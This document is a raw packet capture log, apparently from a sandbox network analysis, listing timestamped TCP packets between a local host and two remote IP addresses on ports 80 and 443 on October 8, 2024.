Oct 8, 2024 20:47:29.090590954 CEST	443	49811	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.090620995 CEST	49811	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.090637922 CEST	443	49811	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.093682051 CEST	49816	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.093728065 CEST	443	49816	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.093800068 CEST	49816	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.093933105 CEST	49816	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.093940973 CEST	443	49816	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.120188951 CEST	443	49812	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.120347023 CEST	443	49812	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.120425940 CEST	49812	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.120575905 CEST	49812	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.120621920 CEST	443	49812	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.120652914 CEST	49812	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.120670080 CEST	443	49812	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.123756886 CEST	49817	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.123853922 CEST	443	49817	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.123939991 CEST	49817	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.124099970 CEST	49817	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.124140024 CEST	443	49817	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.129260063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.129322052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.129411936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.129422903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.129466057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.129470110 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.129479885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.129491091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.129501104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.129529953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.129547119 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.129673004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.129683018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.129690886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.129703045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.129729033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.129753113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.129977942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.129988909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.129997969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130007982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130023956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130036116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130038977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.130045891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130057096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130065918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.130069017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130079985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130086899 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.130090952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130100965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130111933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.130131006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.130140066 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.130342007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130352020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130364895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130394936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.130419970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.130661964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130682945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130693913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130705118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130714893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130717039 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.130723000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130728960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.130732059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130742073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130750895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.130752087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130763054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130774021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130784988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130788088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.130795956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130805969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130808115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.130816936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130826950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130831003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.130839109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130850077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.130861044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.130891085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.131287098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131298065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131340981 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.131423950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131433964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131443977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131453991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131470919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.131477118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131489038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131498098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131500959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.131505013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131515980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131527901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.131527901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131537914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131547928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.131548882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131560087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131568909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.131572008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131582975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131591082 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.131593943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131603956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131609917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.131613970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.131620884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.131660938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.132797956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132822990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132833958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132843971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132853031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.132854939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132865906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132878065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132882118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.132889032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132900000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132911921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132914066 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.132922888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132931948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.132935047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132944107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132956028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132956982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.132967949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132978916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.132985115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.132989883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133001089 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133003950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133014917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133025885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133034945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133035898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133045912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133055925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133059025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133066893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133080959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133083105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133094072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133097887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133130074 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133522987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133533955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133543968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133555889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133568048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133574963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133586884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133616924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133671045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133681059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133701086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133717060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133723021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133725882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133735895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133739948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133748055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133759022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133760929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133769035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133779049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133788109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133790970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133799076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133801937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133811951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133821964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133826017 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133831978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133842945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133850098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133852959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133862019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133862972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.133889914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.133910894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.201051950 CEST	443	49813	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.201734066 CEST	49813	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.201751947 CEST	443	49813	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.202104092 CEST	49813	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.202107906 CEST	443	49813	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.218800068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.218820095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.218830109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.218859911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.218888044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.218955040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.218966007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.218976021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.218986034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219012976 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.219024897 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.219094992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219222069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.219228983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219238997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219249010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219260931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219270945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219275951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.219281912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219293118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219294071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.219305038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219331026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.219348907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.219871044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219882011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219891071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219901085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219913006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219923973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219923973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.219934940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219945908 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.219948053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219959974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.219964027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.219983101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.220010042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.220185041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220232010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.220242023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220253944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220263958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220293999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.220319986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.220334053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220345020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220355034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220367908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220379114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220383883 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.220408916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.220422983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.220633984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220643997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220654964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220665932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220676899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220686913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.220689058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220700979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220712900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.220712900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220727921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220732927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.220737934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220750093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220757008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.220776081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.220793962 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.220961094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.220973015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.221014977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.221117973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.221128941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.221138000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.221148968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.221159935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.221168995 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.221178055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.221188068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.221190929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.221200943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.221205950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.221211910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.221223116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.221230030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.221235037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.221246004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.221257925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.221259117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.221268892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.221276999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.221298933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.221321106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.222729921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.222740889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.222757101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.222788095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.222799063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.222810030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.222811937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.222841978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.222857952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.222922087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.222934008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.222951889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.222963095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.222970009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.222975969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.222981930 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.223005056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.223026991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.223093033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.223103046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.223112106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.223123074 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.223134995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.223145008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.223145962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.223174095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.223186016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.239713907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.239749908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.239759922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.239764929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.239891052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.239901066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.239912987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.239916086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.239923954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.239937067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.239953995 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.239978075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240004063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240015030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240026951 CEST	80	49755	95.164.90.97	192.168.2.5
